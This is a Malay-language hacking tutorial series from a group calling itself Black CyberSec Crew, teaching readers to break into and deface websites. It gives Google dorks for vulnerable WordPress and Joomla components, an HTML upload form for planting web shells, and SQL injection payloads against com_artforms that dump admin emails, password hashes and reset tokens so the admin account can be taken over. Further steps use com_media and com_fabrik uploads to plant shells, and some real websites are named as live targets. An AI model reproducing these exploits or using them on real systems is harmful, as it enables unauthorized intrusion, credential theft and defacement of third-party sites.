Tutorial CSRF

Assalamualaikum dan selamat malam :)

Harini aku nak ajar korang cara deface laman web menggunakan cara CSRF .

APAKAH ITU CSRF ?

CSRF bermaksud Cross Site Request Forgery 

Ok jom belajar xD

Macam biasa , korang masukkan dork ni dekat google search :

inurl:/plugins/simple-forum/

inurl:/wp-content/themes/shepard

inurl:/wp-content/themes/money

inurl:/wp-content/themes/clockstone

inurl:/wp-content/themes/ambleside

inurl:/wp-content/themes/pacifico

Lepas dah search . Korang ambik mana website dekat search tu dan tambah 

/resources/jscript/ajaxupload/sf-uploader.php 

 dekat belakang site tu contoh :

www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php 

Dah ? 

Kalau dah nanti dia akan keluar tulisan error . Kalau keluar tulisan access denied korang carilah laman web lain =)

Sekarang . Korang bukak notepad dan copy poc ni :

<form enctype="multipart/form-data"

action="www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post">

<input type="jpg" name="url" value="./" /><br />

Please choose a file: <input name="uploadfile" type="file" /><br />

<input type="submit" value="upload" />

</form>

Save poc tu dengan nama CSRF.html .

Yang warna biru tu korang padam dan letak link laman web vuln yang korang jumpa tadi tu . 

Bila korang bukak poc tu nanti dia akan keluar form upload . Jadi , upload lah deface korang ataupun shell korang =)

Nak tahu shell korang upload letak ni dekat belakang site.com :

/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php

Ok , Enjoy !!

Jangan lupa creditkan Black CyberSec Crew kalau berjaya nanti =)

 

 

Deface web dengan menggunakan method com_artforms

Hai .. bertemu lagi kita ye .. hahax xD

Assalamualaikum dan selamat pagi =)

Kita masih lagi dalam cara untuk deface website joomla .

Selain , com_media , com_fabrik . Masih mempunyai banyak exploit untuk kita deface website joomla antaranya ialah com_artforms yang akan aku ajar sekarang . Jadi , dengan menggunakan exploit ini . Kemungkinan korang boleh upload shell korang =)

Ok . Jom mulakan .

Macam biasa , masukkan dork com_artforms ni dekat google :

inurl:"option com_artforms"

Dan carilah salah satu website di dalam pencarian itu =)

Lepas dah jumpa , korang letak exploit ni di belakang website itu :

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

Contoh :

www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

Lepas tekan ENTER , korang akan nampak email daripada website tersebut seperti dalam gambar ini . 

Korang copy email tu dan letak di dalam notepad =)

Dah ? Ok . Sekarang korang masuk ke tempat reset password untuk reset password admin tu :D

Buka tab baru . masukkan link website tadi dan letak : 

/index.php?option=com_user&view=reset

Nanti website tu akan jadi macam dalam gambar ni =)

Sebelum nak reset password , korang kena letak email . Ok , korang ambik email yang korang copy tadi tu dan letak dekat kotak email tu dan tekan send =)

Selepas korang dah tekan send , nanti diorang akan cakap diorang perlukan username dan token yang korang dapat dekat email tu :) 

Macamana nak tahu token dan username tu :O ?

Ikut step mudah ni =)

Bukak tab baru dan ambik link website tadi tu lagi sekali . Dan letak ni kat belakang website itu :

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

Nanti akan muncul kod token dan username seperti ini 
admineda7d6142fac40a533b56407a4617371

Yang warna merah itu adalah username manakala yang warna biru itu pula adalah token dia =)

Tapi kalau korang jumpa kod macam ni 

admin39e2d1bd5f899df5c15ac35abb9bc977:$1$c8b6c03c$

Jangan membazir masa , quit je laman web tu :3

Sekarang , korang pergi balik ke tempat isi username dan token tu dan letak token dan username yang korang jumpa tadi dan klik ENTER .

Kini , form untuk kita reset password itu sudah muncul .  Apa lagi .. Reset lah password orang itu dan letaklah password yang korang nak untuk masuk ke web admin tu . Contohnya : ShadowForce

Jika berhasil , korang masuk ke dalam panel admin site itu pula dan log in lah guna email yang korang jumpa tadi dan password yang baru sahaja korang tukar tadi =)

Untuk mengetahui joomla site admin , korang cuma perlu letak /administrator sahaja di belakang site itu seperti www.site.com/administrator

Lepas dah log in tu . Kalau dapat masuk jangan tunggu2 lagi . Tanam lah shell korang dekat situ dan jangan lupa kreditkan Black CyberSec Crew x) Kalau tak dapat .. Carilah website lain :( Teruskan usaha sehingga korang berjaya =)

Sekian sahaja tutorial daripada saya .

Keep calm and smile always =) !

- ShadowForce -

Greets :

./Black Eagle | ./TiadaNama | ./BackSpaceRC | ./TidakDiketahui | ./Godam Crewz | Semua member Black CyberSec Crew dan crew-crew yang lain =) |

Hack laman web menggunakan method com_media

Assalamualaikum . Bertemu lagi kita :D

Harini aku nak ajar korang method com_media . Method ni senang sahaja :) 

Mula-mula korang carilah site mana2 menggunakan dork ni :

-Inurl:index.php?option=com_media

Dork boleh dikembangkan lagi :)

Dah jumpa ? Ok . Sekarang letak exploit ni dekat belakang site tu .

- /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Dan ia akan menjadi seperti ini :

http://www.ikmbintulu.edu.my/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Lepastu korang pilih file korang yang berbentuk .txt / .jpg / .gif kerana tiga ni sahaja yang dibenarkan . Lepas dah pilih korang tekan upload .

Untuk melihat file yang korang upload tadi tu , letak /images/namafilekorang.txt di belakang site itu :)

Contoh : http://www.ikmbintulu.edu.my/images/shadowforce.txt

Itu sahaja tutorial untuk harini =)

Enjoy with the tutorial and stay happy =) !

Greets : Black  CyberSec Crew

Hack laman web menggunakan method Com_fabrik

Assalamualaikum dan salam sejahtera .

Harini aku nak ajar korang cara hack laman web menggunakan method com_fabrik :)

Mula-mula cari website vuln dengan dork ini :

- inurl:index.php?option=com_fabrik

- index.php?option=com_fabrik

Dork boleh dikembangkan lagi :)

Ok . Lepas dah jumpa satu website , korang letak exploit ni di belakang laman web itu :

/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Contohnya macam ni www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Lepas korang tekan enter , nanti akan keluar benda seperti ditunjukkan dalam gambar :

 Takde benda itu ? Jangan lengah lagi .. Exit je laman web tu xD

Kalau ada alhamdulillah :) Sekarang korang tekan choose file tu dan upload lah shell korang . Tapi tak semua laman web boleh upload shell :) Kebanyakkannya boleh upload txt , htm , html bergantung kepada laman web yang korang jumpa :D

Untuk melihat shell yang korang dah upload , letak /media/namashell.php dekat belakang laman web :)

Itu sahaja tutorial daripada aku . 

Live Website : http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

http://www.alertnewsnet.org/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

ok .. Enjoy with the hack ! 

Greets : Black CyberSec Crew